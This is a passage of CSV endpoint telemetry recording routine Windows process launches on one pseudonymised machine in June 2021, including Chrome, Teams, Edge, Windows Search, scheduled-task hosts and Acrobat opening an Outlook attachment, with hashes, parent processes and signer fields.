+817,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:53:46.235282+00:00,10028,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" /InvokerPRAID: App",PortableExecutable,2020-11-11 08:07:19.023623400+00:00,C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\FullTrustNotifier.exe,218632,3b48f5c06c41f721194a47784c60327e,e4572d5929da0ee07bf6c2de6361e247db96149dee5a6f3e7e61074c5b1dae62,d2960ac4d330d3964170aea37c62a147ba845f44,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 07:53:42.904113400+00:00,2720,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,False,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:53:46.362975800+00:00,2021-06-23 07:54:06.451288100+00:00,736728ff-1f18-4d33-a58f-5488132f8bfc,computerpii_0a470890c60768167990033d701e7bd881398861,165414,False,10.7740.19041.1052,False,11540474045174255,,11540474045174256,2021-06-23 07:53:42.904113400+00:00,2720,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\system32\runtimebroker.exe,103288,2018-08-18 19:29:32+00:00,2021-02-17 04:34:50.958184300+00:00,2021-06-22 00:44:19.085614600+00:00,2021-02-17 04:34:50.954376500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,5.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker,,,,,,
+818,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:32:00.859663400+00:00,16260,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320757_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320757 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:32:01.024755500+00:00,2021-06-24 02:33:56.724397700+00:00,46806a07-7654-463f-accf-c4b847ae6cbb,computerpii_0a470890c60768167990033d701e7bd881398861,173436,False,10.7740.19041.1052,False,11540474045144190,,11540474045176027,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+819,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:33:41.589234300+00:00,12512,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8292 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:33:41.847481900+00:00,2021-06-24 02:33:56.724865800+00:00,300471e0-6308-4502-ad2b-37c269519b44,computerpii_0a470890c60768167990033d701e7bd881398861,173451,False,10.7740.19041.1052,False,11540474045175164,,11540474045176032,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+820,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:43:45.766151300+00:00,2752,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7372 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:43:46.677224300+00:00,2021-06-23 02:46:15.944759400+00:00,a2fa1f23-fe02-42c6-a5b3-a0e655c618d1,computerpii_0a470890c60768167990033d701e7bd881398861,159908,False,10.7740.19041.1052,False,11540474045171838,,11540474045172800,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+821,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:45:15.177998700+00:00,13348,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:45:15.663639900+00:00,2021-06-23 02:46:15.945013500+00:00,133be81f-8a7a-45dc-bbba-6536926dda58,computerpii_0a470890c60768167990033d701e7bd881398861,159913,False,10.7740.19041.1052,False,11540474045171838,,11540474045172805,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+822,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:44:30.994838+00:00,18344,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:44:31.031118600+00:00,2021-06-24 11:45:18.855790300+00:00,3921a2b0-e45e-47a0-afb7-de382ee12f8c,computerpii_0a470890c60768167990033d701e7bd881398861,180208,True,10.7740.19041.1052,False,11540474045177893,,11540474045178065,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+823,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 09:57:20.466285500+00:00,20848,taskhostw.exe,taskhostw.exe Install $(Arg0),PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:57:20.505204800+00:00,2021-06-23 09:57:57.529290900+00:00,00398a47-fd8a-4b36-88db-cc40fbaa0e93,computerpii_0a470890c60768167990033d701e7bd881398861,166845,False,10.7740.19041.1052,False,11540474045136925,,11540474045174815,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+824,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:24:38.295906200+00:00,10744,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:24:39.289437200+00:00,2021-06-25 02:25:23.848197500+00:00,0473ee98-3a7b-4edf-87b6-649d37889882,computerpii_0a470890c60768167990033d701e7bd881398861,185448,False,10.7740.19041.1052,False,11540474045178212,,11540474045179063,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+825,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:05:57.172284500+00:00,10692,dmclient.exe,dmclient.exe utcwnf,PortableExecutable,2021-02-17 04:34:43.547067+00:00,C:\Windows\System32\dmclient.exe,121344,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:05:57.331328100+00:00,2021-06-25 02:06:34.311062+00:00,382a3ee1-0051-407e-87f1-959d083fb060,computerpii_0a470890c60768167990033d701e7bd881398861,184874,False,10.7740.19041.1052,False,11540474045136925,,11540474045178958,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client
+826,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:05:57.197134100+00:00,18444,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 02:05:57.172284500+00:00,10692,dmclient.exe,dmclient.exe utcwnf,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:05:57.331760600+00:00,2021-06-25 02:06:34.311143900+00:00,7125e281-7d6f-4614-b4f6-45ffc885aaae,computerpii_0a470890c60768167990033d701e7bd881398861,184875,False,10.7740.19041.1052,False,11540474045178958,,11540474045178959,2021-06-25 02:05:57.172284500+00:00,10692,2021-06-25 02:05:57.172284500+00:00,\Device\HarddiskVolume3\Windows\System32\dmclient.exe,10692,16512,ActiveProcessStartkey,C:\Windows\System32,121344,2083-12-25 18:01:52+00:00,2021-02-17 04:34:43.549079100+00:00,2021-06-25 00:47:16.596170500+00:00,2021-02-17 04:34:43.547067+00:00,16512,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+827,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:45:21.333218400+00:00,12696,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_0b21beff4a58e85c6e7c7588328a034ea40a7624.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 